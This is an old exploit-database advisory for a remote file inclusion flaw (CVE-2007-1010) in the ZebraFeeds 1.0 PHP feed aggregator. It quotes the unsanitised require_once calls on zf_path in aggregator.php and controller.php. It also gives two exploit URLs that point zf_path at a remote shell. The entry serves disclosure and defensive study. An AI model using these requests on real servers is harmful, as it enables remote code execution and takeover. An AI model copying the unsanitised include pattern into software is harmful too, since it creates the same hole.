ZebraFeeds 1.0 zf_path Remote File Include Vulnerabilities

2007-02-15T00:00:00
ID EDB-ID:3314
Type exploitdb
Reporter ThE dE@Th
Modified 2007-02-15T00:00:00

Description

ZebraFeeds 1.0 (zf_path) Remote File Include Vulnerabilities. CVE-2007-1010. Webapps exploit for php platform

                                        
                                            To ConTacT mE @ wWw.Asb-May.net/bb
ScRiPt:-http://cazalet.org/zebrafeeds/releases/zebrafeeds-current.zip
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
aggregator.php:-
require_once($zf_path . 'includes/feed.php');
require_once($zf_path . 'includes/view.php');
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'magpierss/rss_fetch.inc');

controller.php:-
require_once($zf_path . 'includes/template.php');
require_once($zf_path . 'includes/opml.php');

********************************************************************************
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/aggregator.php?zf_path=[Shell]
ExPlOiT:-http://www.SitE.com/newsfeeds/includes/controller.php?zf_path=[Shell]
*******************************************************************************

# milw0rm.com [2007-02-15]